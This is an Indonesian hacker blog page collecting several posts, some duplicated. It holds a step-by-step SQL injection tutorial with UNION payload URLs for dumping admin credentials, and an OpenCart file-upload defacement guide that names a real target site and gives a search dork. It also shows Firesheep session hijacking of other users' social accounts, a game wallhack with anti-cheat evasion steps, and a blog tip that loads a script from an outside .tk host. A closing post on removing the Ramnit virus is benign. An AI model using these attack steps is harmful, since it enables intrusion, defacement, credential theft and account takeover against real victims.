Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.mikezilla.com/exp0012.html dan masih banyak lagi,silahkan kamu cari di paman google...
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
Silahkan DI pelajari Kaka 1 .
======================================
Author : Gonzhack | Indonesian Coder
Posted : MISTERFRIBO | Indonesian Coder & Hacker Team
http://www.indonesianhacker.or.id/ - http://indonesiancoder.com/ - http://jatimcrew.org/
Remote File Upload Opencart (deface)
wah ada mainan baru nie,,,heheeh...
teknik Remote File Upload Opencart ini sangat mudah di mengerti bagi newbie seperti saya yang ingin memulai deface web dengan mudah...
kamu hanya perlu mencari situs yang suport opencart,..
langsung aja yah kyanya pada gk sabar dengan Remote File Upload Opencart ini,,,:P
seperti biasa nyarinya lewat paman google
dork nya :Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangun jadi gini aja Powered By OpenCart
langsung ke caranya,,
jika kamu sudah mendapatkan target nya
contoh target http://hipoint9mm.com/shop/
bisa juga http://hipoint9mm.com/cart/ , http://hipoint9mm.com/patch/ dll
klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadi seperti ini,
http://www.hipoint9mm.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
klo ketemu yang kya gini http://www.hipoint9mm.com/shop/ kamu inject di blakang /shop/ nya..
maka akan muncul tampilan seperti ini..

jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P
jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.hipoint9mm.com/pajenx.htm
code: SUMBER
teknik Remote File Upload Opencart ini sangat mudah di mengerti bagi newbie seperti saya yang ingin memulai deface web dengan mudah...
kamu hanya perlu mencari situs yang suport opencart,..
langsung aja yah kyanya pada gk sabar dengan Remote File Upload Opencart ini,,,:P
seperti biasa nyarinya lewat paman google
dork nya :Powered By OpenCart site:com (site nya bisa kamu ganti,seperti my,il, dll yang penting suport opencart)
klo pengen smuanya,site nya ilangun jadi gini aja Powered By OpenCart
langsung ke caranya,,
jika kamu sudah mendapatkan target nya
contoh target http://hipoint9mm.com/shop/
bisa juga http://hipoint9mm.com/cart/ , http://hipoint9mm.com/patch/ dll
klo udah dapet targetnya tinggal kita inject exploitnya
admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
jadi seperti ini,
http://www.hipoint9mm.com/shop/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
klo ketemu yang kya gini http://www.hipoint9mm.com/shop/ kamu inject di blakang /shop/ nya..
maka akan muncul tampilan seperti ini..

jangan lupa connectornya di ganti jadi PHP.
lalu kamu masukin file deface kamu,jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
untuk melihat apakan berhasil di upload atau tidak kamu ke "Get Folders and Files" dan lihat hasilnya... :P
jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
maka hasilnya seperti ini..
http://www.hipoint9mm.com/pajenx.htm
code: SUMBER
Hijacking social networking Dengan Firesheep
wah cara lama tapi lumayan lah wat iseng2...

siapapun orang yang menggunakan social network dalam satu jaringan maka mreka akan bisa di lihat menggunakan firesheep..

Double-klik pada seseorang, dan Anda langsung login sebagai mereka.
gampang kan,,,
mau coba ,,???
nie langsung sedot aja ...
firesheep
winpcap
caranya pertama insstal winpcap setelah itu download dan instalkan firesheepnya pada addons mozzila,restar mozzila anda dan akan muncul di tab kiri mozzila anda firesheep dan start capture,..
okeh,,firesheep ini sebuah addons firefox,nah fireshep ini bisa melihat FB atau social network yang di buka komputer lain dalam satu network,,,kamu juga bisa merubah isi FB orang,,asik kan,,,
cara kerja firesheep dengan membaca cookies dari komputer yang membuka social network..

siapapun orang yang menggunakan social network dalam satu jaringan maka mreka akan bisa di lihat menggunakan firesheep..

Double-klik pada seseorang, dan Anda langsung login sebagai mereka.
gampang kan,,,
mau coba ,,???
nie langsung sedot aja ...
firesheep
winpcap
caranya pertama insstal winpcap setelah itu download dan instalkan firesheepnya pada addons mozzila,restar mozzila anda dan akan muncul di tab kiri mozzila anda firesheep dan start capture,..
WH TERBARU
waduh udah lama gk ngepost tentang cheat PB,,,
nah sekarang gw pgn bagi2 cheat PB lagi,,gk tanggung2 WH gw bagiin,gk pake bayar...wkwkkw
cara pakai udah ada di dalem,,okeh..
ni link download nya..
passnya PajenK
WH
UPDATE!!!!
karena udah ke ciduk sama GM kemarin Jam 17.00,al hasil WH nya udah ketendang,,,
nah untuk mengakalinnya ada 2 cara ,,,,
pertama cara exrtream...
alat tempur nya Flashdisc
caranya:
1. Copy folder PajenK nya ke FD lo..
2. Buka pajenk.exe nya lewat FD,trus buka PB.
3. Jika sudah terinject akan ada bacaan OK kan,,nah kamu jgn pencet dlu tombol OK nya..melainkan cabut FD nya,,
4. Jika sudah tercabut baru pencet OK,,,
taraa WH gk kedetect...
cara yg kedua(aman)..
alat tempur My LockBox
caranya sama kya pake FD td:
1. Pastinya download dan instal dlu My Lockbox nya...
2. Jika sudah buka My lockbox tray yg berada di pojok kanan bawah..
3. Pilih set+ lalu cari folder PajenK....OK.
4. Jalankan trainer pajenk.exe nya,lalu jalankan PB..
5. Pada saat sukses meninject ada pemberitahuan kan yg liat gambar lebih jelasnya..jgn kamu pencet OK dlu,,
6. Kembali ke My lockbox,,lalu pilih lock..
7. Nah baru deh kamu pencet OK,,,
haahaayyy...WH gk kedetect juga...
Cara bikin mudus hemat energi di blogspot

Duuhh,,,,males banget nulis sekarang yakk,:P,,tapi gw paksain dehh demi sobat blogger,,,:D
okeh sekarang gw akan membagi tips and trick cara membuat modus hemat energi di blogspot,sehingga jika blog kamu diam selama 1 menit, otomatis tampilan blog kamu akan blank/modus hemat energi,seperti yg terlihat di gambar,
langsung aja ke caranya :
1. pertama kamu pergi ke RANCANGAN
2. setelah itu copy script berikut di atas code <head>
<script language='javascript' src='http://pajenk-akbar.tk/safemode.js' type='text/javascript'>
</script>
3. simpan dan lihat hasilnya ....
semoga tips saya ini berguna untuk sobat blogger...
Cara menghilangkan virus RAMNIT
Ciri-ciri terkena virus ramnit yang paling utama adalah:
1.File WATERMARK.EXE yang menjengkelkan ini ternyata ada di dua tempat yaitu :
-C:\Program Files\Microsoft
-C:\Program Files\Common Files\Microsoft
Dan virus ini akan menyebar menjadi namaacakMGR.exe
2.Virus ini menyerang flashdisk sangat mudah . dia menyiapkan 4 buat dshortcut 1 buah file recycler dan autorun.inf
3.Setiap drive jika terkena virus ini akan terkena pula autorun.inf
Cara kerja virus RAMNIT ini:
1.Virus ini menular melalui FD. Dan walaupun autorun sudah kita matikan. Kita bias saja terkena virus ini
2.Saat kita masuk ke desktop PC atau Laptop kita tanpa kita sadari itu adalah manipulasi dari virus ramnit sendiri. Semua system adalah manipulasi dari ramnit. Biangkeroknya adalah watermark.exe
3.Jika diinstal ulang maka virus ini akan muncul lagi apapun alasannya karena virus ini tidak mempunyai file anak. Jadi semua induk. Cara kerjanya:
-Virus dari fd langsung membuat folder bernama C:\Program Files\Microsoft dan C:\Program Files\Common Files\Microsoft
-Dan dia membuat backupan file didalam Folder System Volume Information dan Recycle setiap Harddrive.
-Setelah itu dia menginfeksi semua data dikomputer. Tidak tanggung-tanggung juga. Biar dihapus sama usernya . misalkan di sudah menginfeksi fileku yang ada di D:\aaa\aaa.exe (hanya contoh). Dan folder aaa pun saya hapus
-Lalu kita berpikir jika restart ulang itu bias berhasil. Dan akhirnya memang berhasil. Tetapi jika kita menginstal software aaa.exe td di D:\aaa\ maka virus hasil backupan yang ada di System Volume Information dan Recycle setiap Harddrive akan terbangun dari tidurnya dan kembali menginfeksi virus itu dan dia membuat file watermark lagi didalam :\Program Files\Microsoft dan C:\Program Files\Common Files\Microsoft
Cara menghilangkannya :
1.Bisa juga pake antivir ini http://www.freerav.com/
2.Sebaiknya memang diinstal ulang saja computer anda sekalian tetapi setelah itu jangan diinstal driver dulu. Cara yang harus dilakukan adalah cara ke 3
3.Matikan autorun lewat start-run atau bisa dengan Win+R dan ketikan gpedit.msc . pada computer configuration-system klik 2x pada “Turn off autoplay” klik enable dan bawahnya klik pada All drive dan lakukan hal sama pada user configuration
4.Sementara matikan akses untuk System Volume Information dan Recycle setiap Harddrive. Caranya adalah klik tools Folder option pada tab view hilangi centang pada use simple file sharing dan klik ok, lalu klik kanan pada System Volume Information di drive C:\ klik sharing and security pada tab security klik advanced dan hilangkan centangan pada option dibawahnya. Klik ok. Jika ada peringatan klik ok saja. Dan ok dan selesai. Lakukan pada recycle dan pada drive anda yang lain
5.Buat folder Microsoft pada dua buah tempat yaitu di security c:\program files\ dan c:\program files\common files\ dan lakukan cara ke 4
6.Scan virus dengan antivirus andalan anda. Dan akan dtemui berbagai macam virus berjuta-juta. Jika tempat saya ada 6000 virus . . yang 3000 hanya file htm sih . . tp tetep aja ^&^*&
7. hapus file mecurigakan yang ada di drive kalian misal tryel.exe
8.Seharusnya sampai sini computer sudah aman. Jika tempat saya sih . .hehe
9.Sementara jangan mengkopi file yang sama dengan file yang sudah terinfeksi dfolder yang sama namanya. Seperti saya “D:\program files sudah terinfeksi semua” sekarang saya ganti install di “D:\programs files\” ...
semoga membantu ...
1.File WATERMARK.EXE yang menjengkelkan ini ternyata ada di dua tempat yaitu :
-C:\Program Files\Microsoft
-C:\Program Files\Common Files\Microsoft
Dan virus ini akan menyebar menjadi namaacakMGR.exe
2.Virus ini menyerang flashdisk sangat mudah . dia menyiapkan 4 buat dshortcut 1 buah file recycler dan autorun.inf
3.Setiap drive jika terkena virus ini akan terkena pula autorun.inf
Cara kerja virus RAMNIT ini:
1.Virus ini menular melalui FD. Dan walaupun autorun sudah kita matikan. Kita bias saja terkena virus ini
2.Saat kita masuk ke desktop PC atau Laptop kita tanpa kita sadari itu adalah manipulasi dari virus ramnit sendiri. Semua system adalah manipulasi dari ramnit. Biangkeroknya adalah watermark.exe
3.Jika diinstal ulang maka virus ini akan muncul lagi apapun alasannya karena virus ini tidak mempunyai file anak. Jadi semua induk. Cara kerjanya:
-Virus dari fd langsung membuat folder bernama C:\Program Files\Microsoft dan C:\Program Files\Common Files\Microsoft
-Dan dia membuat backupan file didalam Folder System Volume Information dan Recycle setiap Harddrive.
-Setelah itu dia menginfeksi semua data dikomputer. Tidak tanggung-tanggung juga. Biar dihapus sama usernya . misalkan di sudah menginfeksi fileku yang ada di D:\aaa\aaa.exe (hanya contoh). Dan folder aaa pun saya hapus
-Lalu kita berpikir jika restart ulang itu bias berhasil. Dan akhirnya memang berhasil. Tetapi jika kita menginstal software aaa.exe td di D:\aaa\ maka virus hasil backupan yang ada di System Volume Information dan Recycle setiap Harddrive akan terbangun dari tidurnya dan kembali menginfeksi virus itu dan dia membuat file watermark lagi didalam :\Program Files\Microsoft dan C:\Program Files\Common Files\Microsoft
Cara menghilangkannya :
1.Bisa juga pake antivir ini http://www.freerav.com/
2.Sebaiknya memang diinstal ulang saja computer anda sekalian tetapi setelah itu jangan diinstal driver dulu. Cara yang harus dilakukan adalah cara ke 3
3.Matikan autorun lewat start-run atau bisa dengan Win+R dan ketikan gpedit.msc . pada computer configuration-system klik 2x pada “Turn off autoplay” klik enable dan bawahnya klik pada All drive dan lakukan hal sama pada user configuration
4.Sementara matikan akses untuk System Volume Information dan Recycle setiap Harddrive. Caranya adalah klik tools Folder option pada tab view hilangi centang pada use simple file sharing dan klik ok, lalu klik kanan pada System Volume Information di drive C:\ klik sharing and security pada tab security klik advanced dan hilangkan centangan pada option dibawahnya. Klik ok. Jika ada peringatan klik ok saja. Dan ok dan selesai. Lakukan pada recycle dan pada drive anda yang lain
5.Buat folder Microsoft pada dua buah tempat yaitu di security c:\program files\ dan c:\program files\common files\ dan lakukan cara ke 4
6.Scan virus dengan antivirus andalan anda. Dan akan dtemui berbagai macam virus berjuta-juta. Jika tempat saya ada 6000 virus . . yang 3000 hanya file htm sih . . tp tetep aja ^&^*&
7. hapus file mecurigakan yang ada di drive kalian misal tryel.exe
8.Seharusnya sampai sini computer sudah aman. Jika tempat saya sih . .hehe
9.Sementara jangan mengkopi file yang sama dengan file yang sudah terinfeksi dfolder yang sama namanya. Seperti saya “D:\program files sudah terinfeksi semua” sekarang saya ganti install di “D:\programs files\” ...
semoga membantu ...
cheat WallHack point blank terbaru [23 feb]

waduh udah lama gk ngepost tentang cheat PB,,,
nah sekarang gw pgn bagi2 cheat PB lagi,,gk tanggung2 WH gw bagiin,gk pake bayar...wkwkkw
cara pakai udah ada di dalem,,okeh..
ni link download nya..
passnya PajenK
UPDATE!!!!
karena udah ke ciduk sama GM kemarin Jam 17.00,al hasil WH nya udah ketendang,,,
nah untuk mengakalinnya ada 2 cara ,,,,
pertama cara exrtream...
alat tempur nya Flashdisc
caranya:
1. Copy folder PajenK nya ke FD lo..
2. Buka pajenk.exe nya lewat FD,trus buka PB.
3. Jika sudah terinject akan ada bacaan OK kan,,nah kamu jgn pencet dlu tombol OK nya..melainkan cabut FD nya,,
4. Jika sudah tercabut baru pencet OK,,,
taraa WH gk kedetect...
cara yg kedua(aman)..
alat tempur My LockBox
caranya sama kya pake FD td:
1. Pastinya download dan instal dlu My Lockbox nya...
2. Jika sudah buka My lockbox tray yg berada di pojok kanan bawah..

3. Pilih set+ lalu cari folder PajenK....OK.
4. Jalankan trainer pajenk.exe nya,lalu jalankan PB..
5. Pada saat sukses meninject ada pemberitahuan kan yg liat gambar lebih jelasnya..jgn kamu pencet OK dlu,,

6. Kembali ke My lockbox,,lalu pilih lock..
7. Nah baru deh kamu pencet OK,,,
haahaayyy...WH gk kedetect juga...
Langganan:
Postingan (Atom)

